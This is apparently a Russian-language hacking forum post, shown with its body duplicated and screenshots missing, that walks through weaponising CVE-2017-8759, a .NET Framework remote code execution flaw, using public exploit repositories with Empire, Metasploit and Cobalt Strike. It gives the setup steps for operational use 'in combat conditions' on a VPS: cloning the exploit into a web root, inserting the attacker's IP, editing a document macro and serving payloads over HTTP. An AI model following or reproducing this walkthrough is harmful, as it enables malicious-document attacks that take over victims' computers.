- 08.11.2016
 
- 1 127
 
- 3 175
 
Всем привет, познакомлю Вас с методикой атак: Exploit CVE-2017-8759 (Microsoft Windows .NET Framework RCE)
		
		
	
	
		
	 
	
		
	 
https://github.com/bhdresh/CVE-2017-8759
https://github.com/Voulnet/CVE-2017-8759-Exploit-sample
Будем проводить атаку совместно с Empire, перейдем в папку где крутится сервис Apache : cd /var/www/html
от себя скажу что все это дело запускаем на VPS-e это для боевых условий!
копируем скрипт в папку html : git clone https://github.com/Voulnet/CVE-2017-8759-Exploit-sample
перейдем в нее и удалим лишнее : rm -rf cmd.hta LICENSE README.md
запустим сервис Apache : servise apache2 start
отредактируем exploit.txt , а именно поставим свой IP в 14 строке.
		
	
далее отредактируем файл: Doc1.doc , настроим его макрос:
		
	
Настраиваем Empire :
		
	
		
	
настраиваем порт (или корректируем все ранее): python -m SimpleHTTPServer 8080
можно еще и так (видео)
 
	
		
	
Metasploit
	
		
	
cobalt-strike
	
		
	
Удачи!)
				
			
	Ссылка скрыта от гостей
https://github.com/bhdresh/CVE-2017-8759
https://github.com/Voulnet/CVE-2017-8759-Exploit-sample
Будем проводить атаку совместно с Empire, перейдем в папку где крутится сервис Apache : cd /var/www/html
от себя скажу что все это дело запускаем на VPS-e это для боевых условий!
копируем скрипт в папку html : git clone https://github.com/Voulnet/CVE-2017-8759-Exploit-sample
перейдем в нее и удалим лишнее : rm -rf cmd.hta LICENSE README.md
запустим сервис Apache : servise apache2 start
отредактируем exploit.txt , а именно поставим свой IP в 14 строке.
далее отредактируем файл: Doc1.doc , настроим его макрос:
Настраиваем Empire :
настраиваем порт (или корректируем все ранее): python -m SimpleHTTPServer 8080
можно еще и так (видео)
Metasploit
cobalt-strike
Удачи!)